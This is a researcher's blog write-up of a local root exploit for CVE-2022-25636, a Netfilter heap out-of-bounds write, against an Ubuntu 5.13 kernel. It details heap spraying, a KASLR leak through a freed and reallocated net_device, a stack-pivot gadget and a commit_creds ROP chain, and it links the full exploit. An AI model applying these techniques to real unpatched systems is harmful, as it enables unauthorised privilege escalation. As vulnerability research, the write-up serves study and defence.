CVE-2022-25636
In this blog I will cover the exploitation details for CVE-2022-25636, a bug in the Linux kernel component Netfilter discovered by @kallsyms.
In his blog he already did a great work in explaining how he discovered the vulnerability. So here I will only focus on the exploitation phase.
Introduction
The bug consists in a heap out of bounds write in the function nft_fwd_dup_netdev_offload()
located in nf_dup_netdev.c
.
The bug was introduced in version 5.4
.
The bug
Let’s take a look at the vulnerable function:
int nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx,
struct nft_flow_rule *flow,
enum flow_action_id id, int oif)
{
struct flow_action_entry *entry;
struct net_device *dev;
/* nft_flow_rule_destroy() releases the reference on this device. */
dev = dev_get_by_index(ctx->net, oif);
if (!dev)
return -EOPNOTSUPP;
entry = &flow->rule->action.entries[ctx->num_actions++];
entry->id = id;
entry->dev = dev;
return 0;
}
Each time nft_fwd_dup_netdev_offload()
is called ctx->num_actions
will be incremented regardless of the initial size of rule->action.entries
and the oob write will be triggered:
entry = &flow->rule->action.entries[ctx->num_actions++];
entry->id = id;
entry->dev = dev;
id
is of type enum flow_action_id
and in our case id = FLOW_ACTION_MIRRED = 5
.
dev
is a pointer to the targeted net_device struct
.
net_device
is a struct used to describe network devices ( such as “lo”, “eth0” etc.. ) which resides in the kmalloc-4096
slab and we will later describe it.
Exploitation
The vulnerability doesn’t give us a lot of control over the heap, but luckily it’s enough to give us a root shell :).
We will be targeting Ubuntu 21.10 using kernel version 5.13.0-30
.
Let’s go step by step through the possible ideas for exploitation.
- Leaking the heap
- Leaking function pointers
- RIP control
1. Leaking the heap
As we said before one of the values that is being written out of bounds is a pointer to a net_device
struct, which resides on the heap.
If we manage to allocate a buffer, whose content will be returned to userland, after the struct rule
we could make the dev
pointer land in such buffer and later leak it.
One example for such buffer is the msg_msg struct
.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | |
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
0x00 | list head *next | list head *prev | <- msg_msg
0x10 | m_type | m_ts |
0x20 | *next | *security |
0x30 | | | <--|
0x40 | | | |
0x50 | | | | user data
0x60 | | | |
0x70 | | | <--|
---------------------------------------------------
By changing the number of accounted “dup” expressions we can choose the rule
struct size i.e. the destination kmalloc slab.
This is the rule
struct:
/* offset | size */ struct flow_rule {
/* 0 | 24 */ struct flow_match {
/* 0 | 8 */ struct flow_dissector *dissector;
/* 8 | 8 */ void *mask;
/* 16 | 8 */ void *key;
} match;
/* 24 | 8 */ struct flow_action {
/* 24 | 4 */ unsigned int num_entries;
/* XXX 4-byte hole */
/* 32 | 0 */ struct flow_action_entry entries[];
} action;
}
For example if we only set one “dup” expression the rule
buffer will be of size:
sizeof(struct flow_match) + sizeof(struct flow_action) =
sizeof(struct flow_match) + sizeof(unsigned int) + 1 * sizeof(struct flow_action_entry) =
24 + 4 + 1 * 80 = 108 -> kmalloc-128
So we can choose the kmalloc slab by increasing the number of accounted dups:
28 + 1*80 = 108 -> kmalloc-128
28 + 2*80 = 188 -> kmalloc-192
28 + 3*80 = 268 -> kmalloc-512
...
msg_msg
alternatives
The struct msg_msg
is usually the way to go when spraying the heap. However the struct has a 0x30 bytes long header before the actual buffer:
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
// sizeof(struct msg_msg) = 0x30
Our leak consists of an heap OOB write, and we want to corrupt as few structures on the heap as possible.
Suppose that we set 1 accounted dup (so we are in kmalloc-128).
If our heap spray was succesful (a msg_msg
is directly after the rule struct) then the msg_msg
header isn’t really a problem.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- msg_msg
0x10 | | |
0x20 | | |
0x30 | | | <--|
0x40 | | id (oob 2) | | |
0x50 | | *dev (oob 2) | | user data
0x60 | | | |
0x70 | | | <--|
---------------------------------------------------
To make the net_device pointer land in our buffer we would need to trigger 2 oob dups.
The only corrupted field would be msg_msg.prev
. But this is not a problem.
The problem is that if our spray didn’t succeed, and after the rule
we don’t have our msg_msg
then we could be overwriting important data and make the kernel panic.
My solution to make this leak as much safe as possible was to use msg_msgseg
instead of msg_msg
.
Brief Linux IPC recap
When we call msgsnd()
with a size > DATALEN_MSG (4096 - sizeof(msg_msg) bytes)
, our message is split on the heap using the msg_msg.next
which points to a msg_msgseg
struct.
struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};
// sizeof(struct msg_msgsg) = 0x8
Look at that! We only have a 8 byte header now.
So if we call msgsnd()
with size = (4096 - 0x30) + (128 - 0x8)
we would get a msg_msg
in kmalloc-4096 and a msg_msgseg
in kmalloc-128.
Perfect! We can use this strategy to spray kmalloc-128 using msg_msgseg
.
Back to our example. Now we only need 1 oob dup instead of 2:
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | *next | *dev (oob 1) | <- msg_msgseg
0x10 | | |
0x20 | | |
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
This way we only need 1 oob write. So that if our heap spray failed we corrupted at most 8 bytes, allowing us to try the spray again with less probability of crashing the kernel.
2. Leaking function pointers
Now that we have a stable heap leak we need to leak the base virtual address of the kernel .text
.
The struct net_device
contains many pointers to _ops
structures (which are just structs containing function pointers), so if we find a way to leak its content we could defeat KASLR.
2.1 Overwriting net_device struct
A good starting point to leak kaslr would be to free the net_device
struct and cause a UAF.
One way to free the net_device struct is to overwrite the msg_msg.security
pointer with the net_device
ptr during our OOB writes. Then during the freeing process of the msg_msg
, msg_msg.security
will be freed.
// msgrcv() -> free_msg() -> security_msg_msg_free()
void security_msg_msg_free(struct msg_msg *msg) {
...
kfree(msg->security);
...
}
Here is where the exploit starts losing stability.
Let’s try to overwrite the security
pointer using the kmalloc-128
slab.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- msg_msg
0x10 | | |
0x20 | | *security | <- msg_msg.security
0x30 | | | <--|
0x40 | | id (oob 2) | | |
0x50 | | *dev (oob 2) | | user data
0x60 | | | |
0x70 | | | <--|
---------------------------------------------------
Ooops, because of alignment issues we can’t just overwrite the security
ptr.
However if we use 1 more oob write:
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- msg_msg 1
0x10 | | |
0x20 | | | <- msg_msg.security
0x30 | | |
0x40 | | id (oob 2) | |
0x50 | | *dev (oob 2) |
0x60 | | |
0x70 | | |
---------------------------------------------------
0x00 | | | <- msg_msg 2
0x10 | | id (oob 3) | |
0x20 | | *dev (oob 3) | <- msg_msg.security
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
Yes! We overwrote the msg_msg.security
ptr!
Here the problem is that if our heap spray don’t succeed we could corrupt two different heap allocations.
The biggest problem is when directly after our rule
struct there is a free chunk. In that case the id
field of the second oob write would overwrite the freelist
pointer, which would make the kernel panic very soon.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | | id (acc dup)| |
0x30 | | *dev (acc dup) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | id (oob 1) | |
---------------------------------------------------
0x00 | | *dev (oob 1) | <- free chunk
0x10 | | |
0x20 | | |
0x30 | | |
0x40 | | id (oob 2) | <----------------------- freelist pointer
0x50 | | *dev (oob 2) |
0x60 | | |
0x70 | | |
---------------------------------------------------
0x00 | | | <- msg_msg 1
0x10 | | id (oob 3) | |
0x20 | | *dev (oob 3) | <- msg_msg.security
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
---------------------------------------------------
The idea is to switch the kmalloc slab used by the rule
struct.
Let’s increase the number of accounted dups from 1 to 2 (the rule
struct is now in kmalloc-192) and the number of unaccounted dups to 6.
---------------------------------------------------
0x00 | | | <- rule
0x10 | | |
0x20 | |id (acc dup 1)| |
0x30 | | *dev (acc dup 1) |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | |id (acc dup 2)| |
0x80 | | *dev (acc dup 2) |
0x90 | | |
0xa0 | | |
0xb0 | | |
---------------------------------------------------
0x00 | | id (oob 1) | | <- msg_msg 1
0x10 | | *dev (oob 1) |
0x20 | | |
0x30 | | |
0x40 | | |
0x50 | | id (oob 2) | |
0x60 | | *dev (oob 2) |
0x70 | | |
0x80 | | |
0x90 | | |
0xa0 | | id (oob 3) | |
0xb0 | | *dev (oob 3) |
---------------------------------------------------
0x00 | | | <- msg_msg 2
0x10 | | |
0x20 | | |
0x30 | | id (oob 4) | |
0x40 | | *dev (oob 4) |
0x50 | | |
0x60 | | |
0x70 | | |
0x80 | | id (oob 5) | |
0x90 | | *dev (oob 5) |
0xa0 | | |
0xb0 | | |
---------------------------------------------------
0x00 | | | <- msg_msg 3
0x10 | | id (oob 6) | |
0x20 | | *dev (oob 6) | <- msg_msg.security
0x30 | | |
0x40 | | |
0x50 | | |
0x60 | | |
0x70 | | |
0x80 | | |
0x90 | | |
0xa0 | | |
0xb0 | | |
---------------------------------------------------
Here if our heap spray doesn’t succeed then we could theoretically overwrite 3 different heap structures and maybe cause a kernel panic.
However there isn’t the danger of overwriting the freelist
ptr.
One bonus point is that when we overwrite the security
field of the msg_msg
we are also overwriting the msg_msg.m_type
.
If during msgsnd()
we set the msg_msg.m_type
to 0x4141414141414141
, when freeing the msg_msg
structs we can check if one of the m_type
is 0x4141414100000005
.
If that happens then we know we succesfully overwrote the security
field.
Reallocating the net_device struct
Once we freed the net_device struct we can spray the kmalloc-4096
slab to overwrite the struct.
Most of the operations on the net_device
struct will access data stored at the top of the struct (i.e. in the first 0x30 bytes of the allocation), such as the net_device.name
, which is the first field of the struct.
For that reason we need to control the full reallocated chunk and thus we can’t use msg_msg
spray.
We need to use another spraying technique, the setxattr
spray.
Usually the setxattr
spray is done together with userfaultfd
, however the unprivileged_userfaultfd
sysctl knob doesn’t allow unprivileged user to use it.
As an alternative I used the FUSE technique, which allows to halt the kernel on a copy_to/from_user
exactly like userfaultfd
. To learn more about the FUSE technique I reccomend reading this writeup for CVE-2022-0185.
kmalloc-4096 spray
And what if during our kmalloc-4096
spray we dont’ overwrite the net_device
struct?
The net_device
struct has a field int ifindex
. This field can be retrieved by the SIOCGIFINDEX ioctl
, which takes the name of the net_device
, in our case “lo”.
We can call this ioctl using the if_nametoindex(char *ifname)
function.
For example if “lo” has ifindex = 1
then if_nametoindex("lo")
returns 1
.
When we overwrite the net_device
struct we can set the ifindex
to a recognizable value (e.g 0x41414141
),
so that during the exploit we can check if if_nametoindex("lo")
returns 0x41414141
, and in such case we are sure that the net_device
was overwritten.
2.2 Obtaining arbitrary read
The struct net_device
has a field unsigned char *dev_addr
.
This field normally points to the mac address of the net_device
, and its length is specified by the unsigned char addr_len
field.
One way to read from dev_addr
is through the SIOCGIFHWADDR ioctl
.
Here is an example:
struct ifreq *ifr = calloc(1, 0x1000);
strcpy(ifr->ifr_name, "lo");
int fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
if(!fd) {
perror("socket()");
exit(1);
}
if(ioctl(fd, SIOCGIFHWADDR, ifr) != 0) {
perror("ioctl(SIOCGIFHWADDR)");
exit(1);
}
This is the ioctl handler:
int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
void __user *data, bool *need_copyout)
{
...
switch (cmd) {
case SIOCGIFHWADDR:
dev_load(net, ifr->ifr_name);
ret = dev_get_mac_address(&ifr->ifr_hwaddr, net, ifr->ifr_name);
...
return ret;
...
}
}
dev_get_mac_address
:
int dev_get_mac_address(struct sockaddr *sa, struct net *net, char *dev_name)
{
...
struct net_device *dev;
...
dev = dev_get_by_name_rcu(net, dev_name);
...
if (!dev->addr_len)
memset(sa->sa_data, 0, size);
else
memcpy(sa->sa_data, dev->dev_addr, min_t(size_t, size, dev->addr_len)); // <--- arb read
...
}
Perfect! After reallocating our net_device we can set the dev_addr
pointer to somewhere in the heap and leak data.
But what do we leak? After reallocating the net_device
all of the useful _ops
pointers are gone ( both because of init_on_alloc
and because we overwrote it with our data ).
An interesting fact is that when unsharing into a network namespace, a new net_device
for “lo” is allocated. The idea is the following:
clone()
a child usingCLONE_NEWNET
and leak itsnet_device
ptr as we did before.- In the parent process leak the
net_device
(the twonet_device
leaks are different!!). - Now we can free the parent’s
net_device
, reallocate it, and overwrite the
dev_addr
ptr with the address of the child’snet_device
(which remains untouched and thus still contain many_ops
pointers!). - Call
ioctl(SIOCGIFHWADDR)
in the parent process and boom we leaked KASLR :)
The leak I chose is net_device.netdev_ops
, which in our case points to loopback_ops
.
3. RIP control
Now we have both an heap and .text
leak :). We are very close.
As we said before the net_device
contains many _ops
pointers, so when reallocating the net_device
struct we can set one of the _ops
pointers to somewhere in our heap allocation, set one of its function pointers and execute arbitrary functions.
Obviosuly SMEP is enabled so we can’t just jump back in userland.
The idea is to perform stack pivoting, we can control the heap allocation so we can store our pivoted stack on kernel heap and thus bypass SMAP.
Luckily the kernel is full of useful gadgets to perform stack pivoting.
Most of the net_device
function pointers are invoked with the first parameter set to the net_device
ptr. So a gadget that pivots the stack to $rdi
is perfect. This is the one I found:
push rdi
add BYTE PTR [rbx+0x41],bl
pop rsp
pop r13
pop rbp
ret
Perfect! Now we can simply put a commit_creds(prepare_kernel_cred(0))
ropchain at the top of the reallocated net_device
and get root.
The function pointer I decided to overwrite is dev.ethtool_ops->begin
.
To call the ->begin
function we can use the SIOCETHTOOL ioctl
:
int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
void __user *data, bool *need_copyout)
{
...
switch (cmd) {
...
case SIOCETHTOOL:
dev_load(net, ifr->ifr_name);
...
ret = dev_ethtool(net, ifr);
...
...
}
}
dev_ethtool
:
int dev_ethtool(struct net *net, struct ifreq *ifr)
{
struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
...
if (dev->ethtool_ops->begin) {
rc = dev->ethtool_ops->begin(dev);
if (rc < 0)
return rc;
}
...
}
This is how the reallocated net_device
will look like:
---------------------------------------------------
0x000 | dev.name = "lo" | | <- net_device
0x010 | | | <--|
0x020 | | | | Pivoted stack
0x030 | | | |
0x040 | | | |
0x050 | | | <--|
0x060 | | |
0x070 | | |
...
0x420 | dev.ethtool_ops ptr | ethtool_ops.begin | <- stack pivot gadget
...
---------------------------------------------------
The ropchain I used is the following:
// set $rdi = 0
pop rdi; ret;
prepare_kernel_cred();
// clear Zero Flag, so that the next jne doesn't jump
xor dh, dh; ret;
pop; pop; pop; ret;
// set $rdi to return value of prepare_kernel_cred()
mov rdi, rax; jne; ret;
commit_creds()
// return to userland
kpti_trampoline_pop_rax_pop_rdi_swapgs_iretq
The pop_pop_pop_ret
gadget is there because in order to call dev.ethtool_ops->begin
we must satisfy a check present in dev_ethtool
.
int dev_ethtool(struct net *net, struct ifreq *ifr)
{
struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
...
if (!dev || !netif_device_present(dev)) // <----- this
return -ENODEV;
...
if (dev->ethtool_ops->begin) {
rc = dev->ethtool_ops->begin(dev);
if (rc < 0)
return rc;
}
...
}
static inline bool netif_device_present(const struct net_device *dev)
{
return test_bit(__LINK_STATE_PRESENT, &dev->state);
}
net_device.state
is a bitset and the bit __LINK_STATE_PRESENT
must be set to 1.
Unluckily the unsigned long state
field is at the top of the net_device
struct and it’s in the middle of our pivoted stack.
We can just set net_device.state = 0xffffffffffffffff
and use an extra pop
that just pollutes an unused register and continue the ropchain.
Wrapping up
- We create a child process with a new network namespace
- In the child process we leak its
net_device
pointer - In the parent process we leak its
net_device
pointer - Free the parent’s
net_device
- Reallocate it and overwrite
net_device.dev_addr
with the address of the child’snet_device
- Leak KASLR by reading
net_device.dev_addr
- Free the parent’s
net_device
again - Reallocate it and store a pivoted stack at the top of the heap allocation and overwrite a function pointer with a stack pivot gadget
- Call the gadget, perform stack pivoting and get root :)
Poc
Exploit code
You can find my exploit on Github: https://github.com/Bonfee/CVE-2022-25636